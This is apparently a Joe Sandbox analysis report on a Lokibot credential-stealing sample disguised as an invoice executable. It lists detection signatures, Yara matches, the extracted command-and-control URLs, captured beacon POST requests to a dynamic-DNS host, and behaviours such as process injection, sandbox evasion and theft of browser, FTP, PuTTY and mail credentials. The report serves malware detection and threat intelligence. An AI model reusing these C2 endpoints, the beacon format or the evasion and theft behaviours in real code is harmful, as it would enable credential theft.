Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Invoice and BL.exe

Overview

General Information

Sample Name:Invoice and BL.exe
Analysis ID:458970
MD5:3c7b342067f6142e6ed45551f5f60c50
SHA1:d83513aa4ac743b7fe0f7d1052a37b5ef1b50f60
SHA256:419865b95d9a00faea2d00122baabd7c2ea0be23dd5d3f15eae589bb5a6beecd
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Invoice and BL.exe (PID: 1152 cmdline: 'C:\Users\user\Desktop\Invoice and BL.exe' MD5: 3C7B342067F6142E6ED45551F5F60C50)
    • RegSvcs.exe (PID: 5412 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Invoice and BL.exe.397e408.3.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13278:$s1: http://
        • 0x16233:$s1: http://
        • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13280:$s2: https://
        • 0x13278:$f1: http://
        • 0x16233:$f1: http://
        • 0x13280:$f2: https://
        0.2.Invoice and BL.exe.397e408.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0.2.Invoice and BL.exe.397e408.3.unpackLoki_1Loki Payloadkevoreilly
          • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x133fc:$a2: last_compatible_version
          0.2.Invoice and BL.exe.397e408.3.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x123ff:$des3: 68 03 66 00 00
          • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 15 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
            Multi AV Scanner detection for domain / URLShow sources
            Source: abixmaly.duckdns.orgVirustotal: Detection: 10%Perma Link
            Source: http://abixmaly.duckdns.org/binge/fre.phpVirustotal: Detection: 13%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: Invoice and BL.exeVirustotal: Detection: 59%Perma Link
            Source: Invoice and BL.exeMetadefender: Detection: 31%Perma Link
            Source: Invoice and BL.exeReversingLabs: Detection: 60%
            Machine Learning detection for sampleShow sources
            Source: Invoice and BL.exeJoe Sandbox ML: detected
            Source: Invoice and BL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Invoice and BL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000007.00000002.294503842.0000000000832000.00000002.00020000.sdmp
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,7_2_00403D74

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: abixmaly.duckdns.org
            Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
            Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
            Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
            Source: global trafficHTTP traffic detected: POST /binge/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: abixmaly.duckdns.orgAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D82FEB54Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /binge/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: abixmaly.duckdns.orgAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D82FEB54Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /binge/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: abixmaly.duckdns.orgAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D82FEB54Content-Length: 163Connection: close
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00404ED4 recv,7_2_00404ED4
            Source: unknownDNS traffic detected: queries for: abixmaly.duckdns.org
            Source: unknownHTTP traffic detected: POST /binge/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: abixmaly.duckdns.orgAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D82FEB54Content-Length: 190Connection: close
            Source: RegSvcs.exe, 00000007.00000002.294776027.0000000000F64000.00000004.00000020.sdmpString found in binary or memory: http://abixmaly.duckdns.org/binge/fre.php
            Source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmpString found in binary or memory: http://abixmaly.duckdns.org/binge/fre.phpNg
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: Invoice and BL.exe, NodeGraphControl/NodeGraphNode.csLong String: Length: 24686
            Source: 0.2.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/NodeGraphNode.csLong String: Length: 24686
            Source: 0.0.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/NodeGraphNode.csLong String: Length: 24686
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: Invoice and BL.exe
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD7C230_2_00BD7C23
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD02080_2_00BD0208
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD25B80_2_00BD25B8
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD5B900_2_00BD5B90
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD59180_2_00BD5918
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD11400_2_00BD1140
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1C980_2_00BD1C98
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD16200_2_00BD1620
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD16220_2_00BD1622
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD36100_2_00BD3610
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD00060_2_00BD0006
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD2A500_2_00BD2A50
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1C500_2_00BD1C50
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD16400_2_00BD1640
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD00400_2_00BD0040
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD11B90_2_00BD11B9
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD25B30_2_00BD25B3
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD2F980_2_00BD2F98
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD55900_2_00BD5590
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD5B8C0_2_00BD5B8C
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD2F880_2_00BD2F88
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD55800_2_00BD5580
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD01F90_2_00BD01F9
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD35C50_2_00BD35C5
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD113C0_2_00BD113C
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD15240_2_00BD1524
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD59080_2_00BD5908
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_0279C1240_2_0279C124
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_0279E5700_2_0279E570
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_0279E5600_2_0279E560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040549C7_2_0040549C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004029D47_2_004029D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00405B6F appears 42 times
            Source: Invoice and BL.exe, 00000000.00000002.290027759.00000000039B8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Invoice and BL.exe
            Source: Invoice and BL.exe, 00000000.00000002.288539858.00000000003F4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesH7BDA6.exeD vs Invoice and BL.exe
            Source: Invoice and BL.exe, 00000000.00000002.298627197.0000000008520000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Invoice and BL.exe
            Source: Invoice and BL.exe, 00000000.00000002.289489186.0000000002ACA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameResource_Meter.dll> vs Invoice and BL.exe
            Source: Invoice and BL.exeBinary or memory string: OriginalFilenamesH7BDA6.exeD vs Invoice and BL.exe
            Source: Invoice and BL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@3/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,7_2_0040650A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,7_2_0040434D
            Source: C:\Users\user\Desktop\Invoice and BL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and BL.exe.logJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeMutant created: \Sessions\1\BaseNamedObjects\qnrJUclcstb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: Invoice and BL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Invoice and BL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Invoice and BL.exeVirustotal: Detection: 59%
            Source: Invoice and BL.exeMetadefender: Detection: 31%
            Source: Invoice and BL.exeReversingLabs: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\Invoice and BL.exe 'C:\Users\user\Desktop\Invoice and BL.exe'
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}Jump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: Invoice and BL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Invoice and BL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000007.00000002.294503842.0000000000832000.00000002.00020000.sdmp
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Invoice and BL.exe, NodeGraphControl/frmGiris.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/frmGiris.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/frmGiris.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Yara detected aPLib compressed binaryShow sources
            Source: Yara matchFile source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5412, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD2A48 push esp; iretd 0_2_00BD2A49
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD67A6 push esp; retf 0021h0_2_00BD67A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402AC0 push eax; ret 7_2_00402AD4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402AC0 push eax; ret 7_2_00402AFC
            Source: initial sampleStatic PE information: section name: .text entropy: 7.07527531972
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
